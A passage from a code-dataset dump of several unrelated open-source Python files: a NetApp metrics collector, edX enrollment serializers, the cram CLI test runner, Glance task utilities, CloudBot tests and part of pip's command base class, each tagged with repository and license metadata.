Issue", "STRN-STSI"): "74", ("Transportation Subcommittee", "HAPP-STRA"): "624", ("Transportation", "STRN"): "620", ("Transportation, Regulation, Roads", "HTRR"): "80", ("Transportation: License Plates Subc", "HVES-HLPS"): "625", ("Transportation: License Plates", "HVES-TRLP"): "625", ("Transportation: Railroad & Air Subc", "HTRR-HRRA"): "384", ("Transportation: Railroad and Air", "HTRR-TRAS"): "384", ("Transportation: Reg. & Reg. Sub.", "HTRR-HRRS"): "622", ("Transportation: Regis and Regu", "HTRR-TRES"): "622", ("Transportation: Regulation, Roads", "HTRR"): "80", ("Transportation: Signs & Signals Sub", "HVES-HSSS"): "630", ("Transportation: Signs", "HVES-TRSI"): "630", ("Transportation: Vehicles & Safety", "HVES"): "83", ("Trusts & Estates Law Subcommittee", "HJUA-TELS"): "632", ("Unemployment Insurance Subcommittee", "HLBR-HUIN"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UEMP"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UINS"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UNEM"): "634", ("Vehicles & Safety", "HVES"): "83", ("Veterans Affairs", "HVET"): "87", ("Veterans Affairs", "SVET"): "637", ("Voter Education & Registration Sub", "HELE-VERS"): "638", ("Wage Policy and Study Subcommittee", "HLBR-LWPS"): "1131", ("Water Quality & Quantity, Subcom", "HENE-WATR"): "88", ("Water Subcommittee", "HENE-SWTR"): "88", ("Water", "HENE-WATE"): "88", ("Welfare", "SHHS-SHHW"): "640", ("Whole, Committee of the", "HCWL"): "34", ("Workers Comp Unemploy Insurance", "HLBR-WCUI"): "91", ("Workers Comp. 
and Unemployment Ins.", "HLBR-WCUI"): "91", ("Workers Compensation Subcommittee", "HLBR-HWCO"): "641", ("Workers Compensation Subcommittee", "HLBR-WKCO"): "641", ("Workforce Development Subcommittee", "HLBR-LWDS"): "1132", ("Workforce Reconciliation Subcommitt", "HLBR-HWOR"): "40", ("Workforce Reconciliation Subcommitt", "HLBR-WORE"): "40", ("Workforce Reconciliation Subcommitt", "HLBR-WORK"): "40", ("Youth & Young Adults", "HYYA"): "646", ("Youth and Family", "HYOF"): "647", }
gpl-3.0
CYBERBUGJR/Diamond
src/collectors/netapp/netapp.py
6
16305
# coding=utf-8 """ The NetAppCollector collects metric from a NetApp installation using the NetApp Manageability SDK. This allows access to many metrics not available via SNMP. For this to work you'll the SDK available on the system. This module has been developed using v5.0 of the SDK. As of writing the SDK can be found at https://communities.netapp.com/docs/DOC-1152 You'll also need to specify which NetApp instances the collecter should get data from. Example NetAppCollector.conf: ``` enabled = True path_prefix = netapp [devices] [[na_filer]] ip = 123.123.123.123 user = root password = strongpassword ```` The primary source for documentation about the API has been "NetApp unified storage performance management using open interfaces" https://communities.netapp.com/docs/DOC-1044 """ import sys import time import re import unicodedata from diamond.metric import Metric import diamond.convertor class NetAppCollector(diamond.collector.Collector): # This is the list of metrics to collect. # This is a dict of lists with tuples, which is parsed as such: # The dict name is the object name in the NetApp API. # For each object we have a list of metrics to retrieve. # Each tuple is built like this; # ("metric name in netapp api", "output name of metric", multiplier) # The purpose of the output name is to enable replacement of reported # metric names, since some the names in the API can be confusing. # The purpose of the multiplier is to scale all metrics to a common # scale, which is latencies in milliseconds, and data in bytes per sec. # This is needed since the API will return a mixture of percentages, # nanoseconds, milliseconds, bytes and kilobytes. 
METRICS = {
    'aggregate': [
        ("user_reads", "user_read_iops", 1),
        ("user_writes", "user_write_iops", 1),
    ],
    'disk': [
        ("disk_busy", "disk_busy_pct", 100),
        ("base_for_disk_busy", "base_for_disk_busy", 1),
        ("user_read_blocks", "user_read_blocks_per_sec", 1),
        ("user_write_blocks", "user_write_blocks_per_sec", 1),
        ("user_read_latency", "user_read_latency", 0.001),
        ("user_write_latency", "user_write_latency", 0.001),
    ],
    'ifnet': [
        ("send_data", "tx_bytes_per_sec", 1),
        ("recv_data", "rx_bytes_per_sec", 1),
    ],
    'lun': [
        ("total_ops", "total_iops", 1),
        ("read_ops", "read_iops", 1),
        ("write_ops", "write_iops", 1),
        ("avg_latency", "avg_latency", 1),
    ],
    'processor': [
        ("processor_busy", "processor_busy_pct", 100),
        ("processor_elapsed_time", "processor_elapsed_time", 1),
    ],
    'system': [
        ("nfs_ops", "nfs_iops", 1),
        ("cifs_ops", "cifs_iops", 1),
        # NOTE: "http_ops" was listed twice here; the duplicate entry has
        # been removed so the counter is only requested/processed once.
        ("http_ops", "http_iops", 1),
        ("fcp_ops", "fcp_iops", 1),
        ("iscsi_ops", "iscsi_iops", 1),
        ("read_ops", "read_iops", 1),
        ("write_ops", "write_iops", 1),
        ("total_ops", "total_iops", 1),
        ("cpu_elapsed_time", "cpu_elapsed_time", 1),
        ("total_processor_busy", "total_processor_busy_pct", 100),
        ("avg_processor_busy", "avg_processor_busy_pct", 100),
        # The net/disk counters are reported in kilobytes per second by the
        # API; the multiplier scales them to bytes per second.
        ("net_data_recv", "total_rx_bytes_per_sec", 1000),
        ("net_data_sent", "total_tx_bytes_per_sec", 1000),
        ("disk_data_read", "total_read_bytes_per_sec", 1000),
        ("disk_data_written", "total_write_bytes_per_sec", 1000),
        ("sys_read_latency", "sys_read_latency", 1),
        ("sys_write_latency", "sys_write_latency", 1),
        ("sys_avg_latency", "sys_avg_latency", 1),
    ],
    'vfiler': [
        ("vfiler_cpu_busy", "cpu_busy_pct", 100),
        ("vfiler_cpu_busy_base", "cpu_busy_base", 1),
        ("vfiler_net_data_recv", "rx_bytes_per_sec", 1000),
        ("vfiler_net_data_sent", "tx_bytes_per_sec", 1000),
        ("vfiler_read_ops", "read_iops", 1),
        ("vfiler_write_ops", "write_iops", 1),
        ("vfiler_read_bytes", "read_bytes_per_sec", 1000),
        ("vfiler_write_bytes", "write_bytes_per_sec", 1000),
    ],
    'volume': [
        ("total_ops", "total_iops", 1),
        ("avg_latency", "avg_latency", 0.001),
        ("read_ops", "read_iops", 1),
        ("write_ops", "write_iops", 1),
        ("read_latency", "read_latency", 0.001),
        ("write_latency", "write_latency", 0.001),
        ("read_data", "read_bytes_per_sec", 1),
        ("write_data", "write_bytes_per_sec", 1),
        ("cifs_read_data", "cifs_read_bytes_per_sec", 1),
        ("cifs_write_data", "cifs_write_bytes_per_sec", 1),
        ("cifs_read_latency", "cifs_read_latency", 0.001),
        ("cifs_write_latency", "cifs_write_latency", 0.001),
        ("cifs_read_ops", "cifs_read_iops", 1),
        ("cifs_write_ops", "cifs_write_iops", 1),
        ("fcp_read_data", "fcp_read_bytes_per_sec", 1),
        ("fcp_write_data", "fcp_write_bytes_per_sec", 1),
        ("fcp_read_latency", "fcp_read_latency", 0.001),
        ("fcp_write_latency", "fcp_write_latency", 0.001),
        ("fcp_read_ops", "fcp_read_iops", 1),
        ("fcp_write_ops", "fcp_write_iops", 1),
        ("iscsi_read_data", "iscsi_read_bytes_per_sec", 1),
        ("iscsi_write_data", "iscsi_write_bytes_per_sec", 1),
        ("iscsi_read_latency", "iscsi_read_latency", 0.001),
        ("iscsi_write_latency", "iscsi_write_latency", 0.001),
        ("iscsi_read_ops", "iscsi_read_iops", 1),
        ("iscsi_write_ops", "iscsi_write_iops", 1),
        ("nfs_read_data", "nfs_read_bytes_per_sec", 1),
        ("nfs_write_data", "nfs_write_bytes_per_sec", 1),
        ("nfs_read_latency", "nfs_read_latency", 0.001),
        ("nfs_write_latency", "nfs_write_latency", 0.001),
        ("nfs_read_ops", "nfs_read_iops", 1),
        ("nfs_write_ops", "nfs_write_iops", 1),
    ],
}

# For some metrics we need to divide one value from the API with another.
# This is a key-value list of the connected values.
DIVIDERS = {
    "avg_latency": "total_ops",
    "read_latency": "read_ops",
    "write_latency": "write_ops",
    "sys_avg_latency": "total_ops",
    "sys_read_latency": "read_ops",
    "sys_write_latency": "write_ops",
    "cifs_read_latency": "cifs_read_ops",
    "cifs_write_latency": "cifs_write_ops",
    "fcp_read_latency": "fcp_read_ops",
    "fcp_write_latency": "fcp_write_ops",
    "iscsi_read_latency": "iscsi_read_ops",
    "iscsi_write_latency": "iscsi_write_ops",
    "nfs_read_latency": "nfs_read_ops",
    "nfs_write_latency": "nfs_write_ops",
    "user_read_latency": "user_read_blocks",
    "user_write_latency": "user_write_blocks",
    "total_processor_busy": "cpu_elapsed_time",
    "avg_processor_busy": "cpu_elapsed_time",
    "processor_busy": "processor_elapsed_time",
    "disk_busy": "base_for_disk_busy",
    "vfiler_cpu_busy": "vfiler_cpu_busy_base",
}

# Some metrics are collected simply to calculate other metrics.
# These should not be reported.
DROPMETRICS = [
    "cpu_elapsed_time",
    "processor_elapsed_time",
    "base_for_disk_busy",
    "vfiler_cpu_busy_base",
]

# Since we might have large collections collected often,
# we need a pretty good time_delta.
# We'll use a dict for this, keeping time_delta for each object.
LastCollectTime = {}

def get_default_config_help(self):
    """Return the config help text inherited from the base Collector."""
    config_help = super(NetAppCollector, self).get_default_config_help()
    return config_help

def get_default_config(self):
    """Return the default configuration for this collector.

    Adds the metric path prefix and the filesystem location of the
    NetApp Manageability SDK python modules on top of the base
    Collector defaults.
    """
    default_config = super(NetAppCollector, self).get_default_config()
    default_config['path_prefix'] = "netapp"
    default_config['netappsdkpath'] = "/opt/netapp/lib/python/NetApp"
    return default_config

def _replace_and_publish(self, path, prettyname, value, device):
    """
    Inputs a complete path for a metric and a value.
    Replace the metric name and publish.
    """
    if value is None:
        return
    # Swap the last path component for the pretty output name before
    # publishing.  (A dead "newpath = path" pre-assignment was removed;
    # it was unconditionally overwritten on the next line.)
    newpath = ".".join([".".join(path.split(".")[:-1]), prettyname])
    metric = Metric(newpath, value, precision=4, host=device)
    self.publish_metric(metric)

def _gen_delta_depend(self, path, derivative, multiplier, prettyname,
                      device):
    """
    For some metrics we need to divide the delta for one metric
    with the delta of another.
    Publishes a metric if the conversion goes well.
    """
    primary_delta = derivative[path]
    shortpath = ".".join(path.split(".")[:-1])
    basename = path.split(".")[-1]
    # Bail out unless this metric has a registered divider counter...
    if basename not in self.DIVIDERS:
        return
    mate_key = ".".join([shortpath, self.DIVIDERS[basename]])
    # ...and the divider counter was collected in the same pass.
    if mate_key not in derivative:
        return
    secondary_delta = derivative[mate_key]
    # Only publish when both deltas carry real data.
    if primary_delta > 0 and secondary_delta > 0:
        value = (float(primary_delta) / secondary_delta) * multiplier
        self._replace_and_publish(path, prettyname, value, device)

def _gen_delta_per_sec(self, path, value_delta, time_delta, multiplier,
                       prettyname, device):
    """
    Calculates the difference between two points, and scales it
    to per second.
    """
    # Reject a zero or negative interval.  The original check only
    # rejected negatives, which let time_delta == 0 raise a
    # ZeroDivisionError below.
    if time_delta <= 0:
        return
    value = (value_delta / time_delta) * multiplier
    # Only publish if there is any data.
    # This helps keep unused metrics out of Graphite
    if value > 0.0:
        self._replace_and_publish(path, prettyname, value, device)

def collect(self, device, ip, user, password):
    """
    This function collects the metrics for one filer.
    """
    sys.path.append(self.config['netappsdkpath'])
    try:
        import NaServer
    except ImportError:
        self.log.error("Unable to load NetApp SDK from %s" % (
            self.config['netappsdkpath']))
        return

    # Set up the parameters
    server = NaServer.NaServer(ip, 1, 3)
    server.set_transport_type('HTTPS')
    server.set_style('LOGIN')
    server.set_admin_user(user, password)

    # We're only able to query a single object at a time,
    # so we'll loop over the objects.
for na_object in self.METRICS.keys(): # For easy reference later, generate a new dict for this object LOCALMETRICS = {} for metric in self.METRICS[na_object]: metricname, prettyname, multiplier = metric LOCALMETRICS[metricname] = {} LOCALMETRICS[metricname]["prettyname"] = prettyname LOCALMETRICS[metricname]["multiplier"] = multiplier # Keep track of how long has passed since we checked last CollectTime = time.time() time_delta = None if na_object in self.LastCollectTime.keys(): time_delta = CollectTime - self.LastCollectTime[na_object] self.LastCollectTime[na_object] = CollectTime self.log.debug("Collecting metric of object %s" % na_object) query = NaServer.NaElement("perf-object-get-instances-iter-start") query.child_add_string("objectname", na_object) counters = NaServer.NaElement("counters") for metric in LOCALMETRICS.keys(): counters.child_add_string("counter", metric) query.child_add(counters) res = server.invoke_elem(query) if(res.results_status() == "failed"): self.log.error("Connection to filer %s failed; %s" % ( device, res.results_reason())) return iter_tag = res.child_get_string("tag") num_records = 1 max_records = 100 # For some metrics there are dependencies between metrics for # a single object, so we'll need to collect all, so we can do # calculations later. 
raw = {} while(num_records != 0): query = NaServer.NaElement( "perf-object-get-instances-iter-next") query.child_add_string("tag", iter_tag) query.child_add_string("maximum", max_records) res = server.invoke_elem(query) if(res.results_status() == "failed"): print "Connection to filer %s failed; %s" % ( device, res.results_reason()) return num_records = res.child_get_int("records") if(num_records > 0): instances_list = res.child_get("instances") instances = instances_list.children_get() for instance in instances: raw_name = unicodedata.normalize( 'NFKD', instance.child_get_string("name")).encode( 'ascii', 'ignore') # Shorten the name for disks as they are very long and # padded with zeroes, eg: # 5000C500:3A236B0B:00000000:00000000:00000000:... if na_object is "disk": non_zero_blocks = [ block for block in raw_name.split(":") if block != "00000000" ] raw_name = "".join(non_zero_blocks) instance_name = re.sub(r'\W', '_', raw_name) counters_list = instance.child_get("counters") counters = counters_list.children_get() for counter in counters: metricname = unicodedata.normalize( 'NFKD', counter.child_get_string("name")).encode( 'ascii', 'ignore') metricvalue = counter.child_get_string("value") # We'll need a long complete pathname to not # confuse self.derivative pathname = ".".join([self.config["path_prefix"], device, na_object, instance_name, metricname]) raw[pathname] = int(metricvalue) # Do the math self.log.debug("Processing %i metrics for object %s" % (len(raw), na_object)) # Since the derivative function both returns the derivative # and saves a new point, we'll need to store all derivatives # for local reference. 
derivative = {} for key in raw.keys(): derivative[key] = self.derivative(key, raw[key]) for key in raw.keys(): metricname = key.split(".")[-1] prettyname = LOCALMETRICS[metricname]["prettyname"] multiplier = LOCALMETRICS[metricname]["multiplier"] if metricname in self.DROPMETRICS: continue elif metricname in self.DIVIDERS.keys(): self._gen_delta_depend(key, derivative, multiplier, prettyname, device) else: self._gen_delta_per_sec(key, derivative[key], time_delta, multiplier, prettyname, device)
mit
doismellburning/edx-platform
common/djangoapps/enrollment/serializers.py
6
3423
""" Serializers for all Course Enrollment related return objects. """ import logging from rest_framework import serializers from course_modes.models import CourseMode from student.models import CourseEnrollment log = logging.getLogger(__name__) class StringListField(serializers.CharField): """Custom Serializer for turning a comma delimited string into a list. This field is designed to take a string such as "1,2,3" and turn it into an actual list [1,2,3] """ def field_to_native(self, obj, field_name): """ Serialize the object's class name. """ if not obj.suggested_prices: return [] items = obj.suggested_prices.split(',') return [int(item) for item in items] class CourseSerializer(serializers.Serializer): # pylint: disable=abstract-method """ Serialize a course descriptor and related information. """ course_id = serializers.CharField(source="id") enrollment_start = serializers.DateTimeField(format=None) enrollment_end = serializers.DateTimeField(format=None) course_start = serializers.DateTimeField(source="start", format=None) course_end = serializers.DateTimeField(source="end", format=None) invite_only = serializers.BooleanField(source="invitation_only") course_modes = serializers.SerializerMethodField() def __init__(self, *args, **kwargs): self.include_expired = kwargs.pop("include_expired", False) super(CourseSerializer, self).__init__(*args, **kwargs) def get_course_modes(self, obj): """ Retrieve course modes associated with the course. """ course_modes = CourseMode.modes_for_course( obj.id, include_expired=self.include_expired, only_selectable=False ) return [ ModeSerializer(mode).data for mode in course_modes ] class CourseEnrollmentSerializer(serializers.ModelSerializer): """Serializes CourseEnrollment models Aggregates all data from the Course Enrollment table, and pulls in the serialization for the Course Descriptor and course modes, to give a complete representation of course enrollment. 
""" course_details = CourseSerializer(source="course_overview") user = serializers.SerializerMethodField('get_username') def get_username(self, model): """Retrieves the username from the associated model.""" return model.username class Meta(object): # pylint: disable=missing-docstring model = CourseEnrollment fields = ('created', 'mode', 'is_active', 'course_details', 'user') lookup_field = 'username' class ModeSerializer(serializers.Serializer): """Serializes a course's 'Mode' tuples Returns a serialized representation of the modes available for course enrollment. The course modes models are designed to return a tuple instead of the model object itself. This serializer does not handle the model object itself, but the tuple. """ slug = serializers.CharField(max_length=100) name = serializers.CharField(max_length=255) min_price = serializers.IntegerField() suggested_prices = StringListField(max_length=255) currency = serializers.CharField(max_length=8) expiration_datetime = serializers.DateTimeField() description = serializers.CharField() sku = serializers.CharField()
agpl-3.0
akopytov/sysbench
third_party/cram/cram/_main.py
2
7967
"""Main entry point""" import optparse import os import shlex import shutil import sys import tempfile try: import configparser except ImportError: # pragma: nocover import ConfigParser as configparser from cram._cli import runcli from cram._encoding import b, fsencode, stderrb, stdoutb from cram._run import runtests from cram._xunit import runxunit def _which(cmd): """Return the path to cmd or None if not found""" cmd = fsencode(cmd) for p in os.environ['PATH'].split(os.pathsep): path = os.path.join(fsencode(p), cmd) if os.path.isfile(path) and os.access(path, os.X_OK): return os.path.abspath(path) return None def _expandpath(path): """Expands ~ and environment variables in path""" return os.path.expanduser(os.path.expandvars(path)) class _OptionParser(optparse.OptionParser): """Like optparse.OptionParser, but supports setting values through CRAM= and .cramrc.""" def __init__(self, *args, **kwargs): self._config_opts = {} optparse.OptionParser.__init__(self, *args, **kwargs) def add_option(self, *args, **kwargs): option = optparse.OptionParser.add_option(self, *args, **kwargs) if option.dest and option.dest != 'version': key = option.dest.replace('_', '-') self._config_opts[key] = option.action == 'store_true' return option def parse_args(self, args=None, values=None): config = configparser.RawConfigParser() config.read(_expandpath(os.environ.get('CRAMRC', '.cramrc'))) defaults = {} for key, isbool in self._config_opts.items(): try: if isbool: try: value = config.getboolean('cram', key) except ValueError: value = config.get('cram', key) self.error('--%s: invalid boolean value: %r' % (key, value)) else: value = config.get('cram', key) except (configparser.NoSectionError, configparser.NoOptionError): pass else: defaults[key] = value self.set_defaults(**defaults) eargs = os.environ.get('CRAM', '').strip() if eargs: args = args or [] args += shlex.split(eargs) try: return optparse.OptionParser.parse_args(self, args, values) except optparse.OptionValueError: 
self.error(str(sys.exc_info()[1])) def _parseopts(args): """Parse command line arguments""" p = _OptionParser(usage='cram [OPTIONS] TESTS...', prog='cram') p.add_option('-V', '--version', action='store_true', help='show version information and exit') p.add_option('-q', '--quiet', action='store_true', help="don't print diffs") p.add_option('-v', '--verbose', action='store_true', help='show filenames and test status') p.add_option('-i', '--interactive', action='store_true', help='interactively merge changed test output') p.add_option('-d', '--debug', action='store_true', help='write script output directly to the terminal') p.add_option('-y', '--yes', action='store_true', help='answer yes to all questions') p.add_option('-n', '--no', action='store_true', help='answer no to all questions') p.add_option('-E', '--preserve-env', action='store_true', help="don't reset common environment variables") p.add_option('-e', '--no-err-files', action='store_true', help="don't write .err files on test failures") p.add_option('--keep-tmpdir', action='store_true', help='keep temporary directories') p.add_option('--shell', action='store', default='/bin/sh', metavar='PATH', help='shell to use for running tests (default: %default)') p.add_option('--shell-opts', action='store', metavar='OPTS', help='arguments to invoke shell with') p.add_option('--indent', action='store', default=2, metavar='NUM', type='int', help=('number of spaces to use for indentation ' '(default: %default)')) p.add_option('--xunit-file', action='store', metavar='PATH', help='path to write xUnit XML output') opts, paths = p.parse_args(args) paths = [fsencode(path) for path in paths] return opts, paths, p.get_usage def main(args): """Main entry point. If you're thinking of using Cram in other Python code (e.g., unit tests), consider using the test() or testfile() functions instead. 
:param args: Script arguments (excluding script name) :type args: str :return: Exit code (non-zero on failure) :rtype: int """ opts, paths, getusage = _parseopts(args) if opts.version: sys.stdout.write("""Cram CLI testing framework (version 0.7) Copyright (C) 2010-2016 Brodie Rao <brodie@bitheap.org> and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. """) return conflicts = [('--yes', opts.yes, '--no', opts.no), ('--quiet', opts.quiet, '--interactive', opts.interactive), ('--debug', opts.debug, '--quiet', opts.quiet), ('--debug', opts.debug, '--interactive', opts.interactive), ('--debug', opts.debug, '--verbose', opts.verbose), ('--debug', opts.debug, '--xunit-file', opts.xunit_file)] for s1, o1, s2, o2 in conflicts: if o1 and o2: sys.stderr.write('options %s and %s are mutually exclusive\n' % (s1, s2)) return 2 shellcmd = _which(opts.shell) if not shellcmd: stderrb.write(b('shell not found: ') + fsencode(opts.shell) + b('\n')) return 2 shell = [shellcmd] if opts.shell_opts: shell += shlex.split(opts.shell_opts) patchcmd = None if opts.interactive: patchcmd = _which('patch') if not patchcmd: sys.stderr.write('patch(1) required for -i\n') return 2 if not paths: sys.stdout.write(getusage()) return 2 badpaths = [path for path in paths if not os.path.exists(path)] if badpaths: stderrb.write(b('no such file: ') + badpaths[0] + b('\n')) return 2 if opts.yes: answer = 'y' elif opts.no: answer = 'n' else: answer = None tmpdir = os.environ['CRAMTMP'] = tempfile.mkdtemp('', 'cramtests-') tmpdirb = fsencode(tmpdir) proctmp = os.path.join(tmpdir, 'tmp') for s in ('TMPDIR', 'TEMP', 'TMP'): os.environ[s] = proctmp os.mkdir(proctmp) try: tests = runtests(paths, tmpdirb, shell, indent=opts.indent, cleanenv=not opts.preserve_env, debug=opts.debug, noerrfiles=opts.no_err_files) if not opts.debug: tests = runcli(tests, quiet=opts.quiet, verbose=opts.verbose, 
patchcmd=patchcmd, answer=answer, noerrfiles=opts.no_err_files) if opts.xunit_file is not None: tests = runxunit(tests, opts.xunit_file) hastests = False failed = False for path, test in tests: hastests = True refout, postout, diff = test() if diff: failed = True if not hastests: sys.stderr.write('no tests found\n') return 2 return int(failed) finally: if opts.keep_tmpdir: stdoutb.write(b('# Kept temporary directory: ') + tmpdirb + b('\n')) else: shutil.rmtree(tmpdir)
gpl-2.0
SamuelMarks/edx-dl
edx_dl/common.py
4
1534
# -*- coding: utf-8 -*- """ Common type definitions and constants for edx-dl """ from collections import namedtuple # The next four named tuples represent the structure of courses in edX. The # structure is: # # * A Course contains Sections # * Each Section contains Subsections # * Each Subsection contains Units # # Notice that we don't represent the full tree structure for both performance # and UX reasons: # # Course -> [Section] -> [SubSection] -> [Unit] -> [Video] # # In the script the data structures used are: # # 1. The data structures to represent the course information: # Course, Section->[SubSection] # # 2. The data structures to represent the chosen courses and sections: # selections = {Course, [Section]} # # 3. The data structure of all the downloable resources which represent each # subsection via its URL and the of resources who can be extracted from the # Units it contains: # all_units = {Subsection.url: [Unit]} # # 4. The units can contain multiple videos: # Unit -> [Video] # Course = namedtuple('Course', ['id', 'name', 'url', 'state']) Section = namedtuple('Section', ['position', 'name', 'url', 'subsections']) SubSection = namedtuple('SubSection', ['position', 'name', 'url']) Unit = namedtuple('Unit', ['videos', 'resources_urls']) Video = namedtuple('Video', ['video_youtube_url', 'available_subs_url', 'sub_template_url', 'mp4_urls']) YOUTUBE_DL_CMD = ['youtube-dl', '--ignore-config'] DEFAULT_CACHE_FILENAME = 'edx-dl.cache'
lgpl-3.0
tobegit3hub/glance_docker
glance/common/scripts/utils.py
10
4580
# Copyright 2014 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. __all__ = [ 'get_task', 'unpack_task_input', 'set_base_image_properties', 'validate_location_uri', 'get_image_data_iter', ] from oslo_log import log as logging from six.moves import urllib from glance.common import exception from glance import i18n LOG = logging.getLogger(__name__) _ = i18n._ _LE = i18n._LE def get_task(task_repo, task_id): """Gets a TaskProxy object. :param task_repo: TaskRepo object used to perform DB operations :param task_id: ID of the Task """ task = None try: task = task_repo.get(task_id) except exception.NotFound: msg = _LE('Task not found for task_id %s') % task_id LOG.exception(msg) return task def unpack_task_input(task): """Verifies and returns valid task input dictionary. :param task: Task domain object """ task_input = task.task_input # NOTE: until we support multiple task types, we just check for # input fields related to 'import task'. for key in ["import_from", "import_from_format", "image_properties"]: if key not in task_input: msg = _("Input does not contain '%(key)s' field") % {"key": key} raise exception.Invalid(msg) return task_input def set_base_image_properties(properties=None): """Sets optional base properties for creating Image. 
:param properties: Input dict to set some base properties """ if isinstance(properties, dict) and len(properties) == 0: # TODO(nikhil): We can make these properties configurable while # implementing the pipeline logic for the scripts. The below shown # are placeholders to show that the scripts work on 'devstack' # environment. properties['disk_format'] = 'qcow2' properties['container_format'] = 'bare' def validate_location_uri(location): """Validate location uri into acceptable format. :param location: Location uri to be validated """ if not location: raise exception.BadStoreUri(_('Invalid location: %s') % location) elif location.startswith(('http://', 'https://')): return location # NOTE: file type uri is being avoided for security reasons, # see LP bug #942118 #1400966. elif location.startswith(("file:///", "filesystem:///")): msg = _("File based imports are not allowed. Please use a non-local " "source of image data.") # NOTE: raise Exception and let the encompassing block save # the error msg in the task.message. raise StandardError(msg) else: # TODO(nikhil): add other supported uris supported = ['http', ] msg = _("The given uri is not valid. Please specify a " "valid uri from the following list of supported uri " "%(supported)s") % {'supported': supported} raise urllib.error.URLError(msg) def get_image_data_iter(uri): """Returns iterable object either for local file or uri :param uri: uri (remote or local) to the datasource we want to iterate Validation/sanitization of the uri is expected to happen before we get here. """ # NOTE(flaper87): This is safe because the input uri is already # verified before the task is created. if uri.startswith("file://"): uri = uri.split("file://")[-1] # NOTE(flaper87): The caller of this function expects to have # an iterable object. FileObjects in python are iterable, therefore # we are returning it as is. # The file descriptor will be eventually cleaned up by the garbage # collector once its ref-count is dropped to 0. 
That is, when there # wont be any references pointing to this file. # # We're not using StringIO or other tools to avoid reading everything # into memory. Some images may be quite heavy. return open(uri, "r") return urllib.request.urlopen(uri)
apache-2.0
linuxdaemon/CloudBot
tests/core_tests/util_tests/test_textgen.py
3
1117
import re def test_textgenerator(): from cloudbot.util.textgen import TextGenerator generator = TextGenerator( [ '{thing} is {stuff}' ], { 'thing': ['a', 'b'], 'stuff': [ 'c', ('d', 2), ] } ) for s in generator.generate_strings(4): assert re.match(r'[ab] is [cd]', s) assert generator.get_template(0) == '{thing} is {stuff}' def test_textgen_default_tmpl(): from cloudbot.util.textgen import TextGenerator generator = TextGenerator( [ '{thing} is {stuff} {a}', '{thing} are {stuff} {a}', ], { 'thing': ['a', 'b'], 'stuff': [ 'c', ('d', 2), ] }, default_templates=[1], variables={'a': 'foo'} ) for s in generator.generate_strings(4): assert re.match(r'[ab] are [cd] foo', s) assert generator.get_template(0) == '{thing} is {stuff} {a}' assert generator.get_template(1) == '{thing} are {stuff} {a}'
gpl-3.0
AkhilHector/Rex.Inc
.env/lib/python2.7/site-packages/pip/basecommand.py
181
10617
"""Base Command class, and related routines""" from __future__ import absolute_import import logging import os import sys import optparse import warnings from pip import cmdoptions from pip.locations import running_under_virtualenv from pip.download import PipSession from pip.exceptions import (BadCommand, InstallationError, UninstallationError, CommandError, PreviousBuildDirError) from pip.compat import logging_dictConfig from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter from pip.req import InstallRequirement, parse_requirements from pip.status_codes import ( SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND, PREVIOUS_BUILD_DIR_ERROR, ) from pip.utils import get_prog, normalize_path from pip.utils.deprecation import RemovedInPip8Warning from pip.utils.logging import IndentingFormatter from pip.utils.outdated import pip_version_check __all__ = ['Command'] logger = logging.getLogger(__name__) class Command(object): name = None usage = None hidden = False log_streams = ("ext://sys.stdout", "ext://sys.stderr") def __init__(self, isolated=False): parser_kw = { 'usage': self.usage, 'prog': '%s %s' % (get_prog(), self.name), 'formatter': UpdatingDefaultsHelpFormatter(), 'add_help_option': False, 'name': self.name, 'description': self.__doc__, 'isolated': isolated, } self.parser = ConfigOptionParser(**parser_kw) # Commands should add options to this option group optgroup_name = '%s Options' % self.name.capitalize() self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name) # Add the general options gen_opts = cmdoptions.make_option_group( cmdoptions.general_group, self.parser, ) self.parser.add_option_group(gen_opts) def _build_session(self, options, retries=None, timeout=None): session = PipSession( cache=( normalize_path(os.path.join(options.cache_dir, "http")) if options.cache_dir else None ), retries=retries if retries is not None else options.retries, insecure_hosts=options.trusted_hosts, ) # Handle custom ca-bundles from the user 
if options.cert: session.verify = options.cert # Handle SSL client certificate if options.client_cert: session.cert = options.client_cert # Handle timeouts if options.timeout or timeout: session.timeout = ( timeout if timeout is not None else options.timeout ) # Handle configured proxies if options.proxy: session.proxies = { "http": options.proxy, "https": options.proxy, } # Determine if we can prompt the user for authentication or not session.auth.prompting = not options.no_input return session def parse_args(self, args): # factored out for testability return self.parser.parse_args(args) def main(self, args): options, args = self.parse_args(args) if options.quiet: if options.quiet == 1: level = "WARNING" if options.quiet == 2: level = "ERROR" else: level = "CRITICAL" elif options.verbose: level = "DEBUG" else: level = "INFO" logging_dictConfig({ "version": 1, "disable_existing_loggers": False, "filters": { "exclude_warnings": { "()": "pip.utils.logging.MaxLevelFilter", "level": logging.WARNING, }, }, "formatters": { "indent": { "()": IndentingFormatter, "format": ( "%(message)s" if not options.log_explicit_levels else "[%(levelname)s] %(message)s" ), }, }, "handlers": { "console": { "level": level, "class": "pip.utils.logging.ColorizedStreamHandler", "stream": self.log_streams[0], "filters": ["exclude_warnings"], "formatter": "indent", }, "console_errors": { "level": "WARNING", "class": "pip.utils.logging.ColorizedStreamHandler", "stream": self.log_streams[1], "formatter": "indent", }, "user_log": { "level": "DEBUG", "class": "pip.utils.logging.BetterRotatingFileHandler", "filename": options.log or "/dev/null", "delay": True, "formatter": "indent", }, }, "root": { "level": level, "handlers": list(filter(None, [ "console", "console_errors", "user_log" if options.log else None, ])), }, # Disable any logging besides WARNING unless we have DEBUG level # logging enabled. These use both pip._vendor and the bare names # for the case where someone unbundles our libraries. 
